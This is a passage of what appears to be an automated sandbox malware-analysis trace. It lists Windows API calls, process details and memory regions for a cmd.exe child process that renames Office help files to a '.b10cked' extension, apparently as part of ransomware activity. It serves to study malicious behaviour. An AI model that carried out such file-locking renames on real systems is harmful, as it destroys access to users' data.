nBufferLength=0x104, lpBuffer=0x28f4b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f4b0, lpFilePart=0x28f4ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f4ac*="Desktop") returned 0x18 [0202.448] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.448] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x80010 [0202.448] FindClose (in: hFindFile=0x80010 | out: hFindFile=0x80010) returned 1 [0202.448] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x80010 [0202.448] FindClose (in: hFindFile=0x80010 | out: hFindFile=0x80010) returned 1 [0202.448] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x80010 
[0202.448] FindClose (in: hFindFile=0x80010 | out: hFindFile=0x80010) returned 1 [0202.448] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.448] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.448] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.448] GetEnvironmentStringsW () returned 0x82af0* [0202.448] FreeEnvironmentStringsW (penv=0x82af0) returned 1 [0202.449] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.449] GetConsoleOutputCP () returned 0x1b5 [0202.449] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.450] GetUserDefaultLCID () returned 0x409 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="0") returned 2 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="0") returned 2 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="1") returned 2 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 
[0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.451] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.452] GetConsoleTitleW (in: lpConsoleTitle=0x708e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.452] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.452] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.452] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.453] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.453] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.453] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.453] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.453] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.453] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.453] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.455] GetConsoleTitleW (in: lpConsoleTitle=0x28f2e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.456] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.456] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.456] _wcsicmp (_String1="move", _String2="DEL") 
returned 9 [0202.456] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.456] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.456] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.456] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.456] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.456] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.456] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.456] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.456] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.456] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.456] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.456] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.456] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.456] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.456] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.456] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.456] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.456] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.456] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.456] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.456] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.456] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.456] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.456] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.456] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.456] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.456] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.456] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.456] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.456] _wcsicmp (_String1="move", 
_String2="DPATH") returned 9 [0202.456] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.456] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.458] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.458] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.458] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f0a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f09c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f09c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.458] _wcsnicmp (_String1="COPYCMD", 
_String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.459] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.459] _wcsicmp (_String1="MSWINW~1.HXN", _String2=".") returned 63 [0202.459] _wcsicmp (_String1="MSWINW~1.HXN", _String2="..") returned 63 [0202.459] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinw~1.hxn")) returned 0x2022 [0202.459] GetCurrentDirectoryW 
(in: nBufferLength=0x104, lpBuffer=0x81e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.459] SetErrorMode (uMode=0x0) returned 0x0 [0202.460] SetErrorMode (uMode=0x1) returned 0x0 [0202.460] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", nBufferLength=0x104, lpBuffer=0x28ea2c, lpFilePart=0x28ea14 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", lpFilePart=0x28ea14*="MSWINW~1.HXN") returned 0x27 [0202.460] SetErrorMode (uMode=0x0) returned 0x1 [0202.460] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.460] _wcsicmp (_String1="MSWINW~1.HXN", _String2=".") returned 63 [0202.460] _wcsicmp (_String1="MSWINW~1.HXN", _String2="..") returned 63 [0202.460] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinw~1.hxn")) returned 0x2022 [0202.460] SetErrorMode (uMode=0x0) returned 0x0 [0202.460] SetErrorMode (uMode=0x1) returned 0x0 [0202.460] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", nBufferLength=0x104, lpBuffer=0x28eea8, lpFilePart=0x28ec40 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", lpFilePart=0x28ec40*="MSWINW~1.HXN") returned 0x27 [0202.460] SetErrorMode (uMode=0x0) returned 0x1 [0202.460] SetErrorMode (uMode=0x0) returned 0x0 [0202.460] SetErrorMode (uMode=0x1) returned 0x0 [0202.460] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x28f0b0, lpFilePart=0x28ec40 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked", lpFilePart=0x28ec40*="MS.WINWORD.14.1033.hxn.b10cked") returned 0x39 [0202.460] SetErrorMode (uMode=0x0) returned 0x1 [0202.460] SetLastError (dwErrCode=0x0) [0202.460] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked" (normalized: 
"c:\\users\\alluse~1\\micros~2\\ms.winword.14.1033.hxn.b10cked")) returned 0xffffffff [0202.460] GetLastError () returned 0x2 [0202.460] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x28e5bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e5bc) returned 0x70e70 [0202.461] FindNextFileW (in: hFindFile=0x70e70, lpFindFileData=0x28e5bc | out: lpFindFileData=0x28e5bc) returned 0 [0202.461] FindClose (in: hFindFile=0x70e70 | out: hFindFile=0x70e70) returned 1 [0202.461] GetLastError () returned 0x12 [0202.461] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x28e5bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e5bc) returned 0x70e70 [0202.461] FindNextFileW (in: hFindFile=0x70e70, lpFindFileData=0x28e5bc | out: lpFindFileData=0x28e5bc) returned 0 [0202.461] FindClose (in: hFindFile=0x70e70 | out: hFindFile=0x70e70) returned 1 [0202.461] GetLastError () returned 0x12 [0202.462] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x81be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81be0) returned 0x70e70 [0202.462] FindNextFileW (in: hFindFile=0x70e70, lpFindFileData=0x81be0 | out: lpFindFileData=0x81be0) returned 0 [0202.462] FindClose (in: hFindFile=0x70e70 | out: hFindFile=0x70e70) returned 1 [0202.462] GetLastError () returned 0x12 [0202.462] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x81be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81be0) returned 0x70e70 [0202.462] FindNextFileW (in: hFindFile=0x70e70, lpFindFileData=0x81be0 | out: lpFindFileData=0x81be0) returned 0 [0202.462] FindClose (in: hFindFile=0x70e70 | out: hFindFile=0x70e70) returned 1 [0202.463] 
GetLastError () returned 0x12 [0202.463] _get_osfhandle (_FileHandle=2) returned 0xb [0202.463] GetFileType (hFile=0xb) returned 0x2 [0202.660] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.660] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28e78c | out: lpMode=0x28e78c) returned 1 [0202.660] _get_osfhandle (_FileHandle=2) returned 0xb [0202.660] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x28e7c0 | out: lpConsoleScreenBufferInfo=0x28e7c0) returned 1 [0202.660] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.661] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28e800 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.662] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x28e7e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28e7e4*=0x2c) returned 1 [0202.662] longjmp () [0202.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.662] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.662] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.662] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.662] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.662] SetConsoleInputExeNameW () returned 0x1 [0202.662] GetConsoleOutputCP () returned 0x1b5 [0202.662] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.662] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.663] exit (_Code=1) Process: id = "485" image_name = "cmd.exe" filename = 
"c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16aa0" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29461 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29462 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29463 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29464 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 29465 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29466 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29467 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name 
= "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29468 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29469 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29470 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30014 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30015 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30016 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30017 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 30018 start_va = 0x4b0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 30019 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30020 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30021 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name 
= "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30022 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30023 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30024 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30025 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30026 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30027 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30028 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30029 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30030 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") 
Region: id = 30031 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 30032 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 30033 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 30034 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 30035 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 30036 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 30037 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 30038 start_va = 0x1320000 end_va = 0x13dffff entry_point = 0x1320000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 682 os_tid = 0xf20 [0202.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fc7c | out: lpSystemTimeAsFileTime=0x30fc7c*(dwLowDateTime=0xadbc5a80, dwHighDateTime=0x1d440a9)) [0202.873] GetCurrentProcessId () returned 0xe6c [0202.873] GetCurrentThreadId () returned 0xf20 [0202.873] GetTickCount () returned 0x393d5 [0202.873] QueryPerformanceCounter (in: lpPerformanceCount=0x30fc74 | out: lpPerformanceCount=0x30fc74*=25966188580) returned 1 [0202.873] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.873] __set_app_type (_Type=0x1) [0202.873] __p__fmode () returned 0x76b331f4 [0202.874] __p__commode () returned 
0x76b331fc [0202.874] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.874] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.874] GetCurrentThreadId () returned 0xf20 [0202.874] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf20) returned 0x38 [0202.874] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.874] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.874] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.874] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fc0c | out: phkResult=0x30fc0c*=0x0) returned 0x2 [0202.875] VirtualQuery (in: lpAddress=0x30fc43, lpBuffer=0x30fbdc, dwLength=0x1c | out: lpBuffer=0x30fbdc*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.875] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fbdc, dwLength=0x1c | out: lpBuffer=0x30fbdc*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.875] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fbdc, dwLength=0x1c | out: lpBuffer=0x30fbdc*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.875] 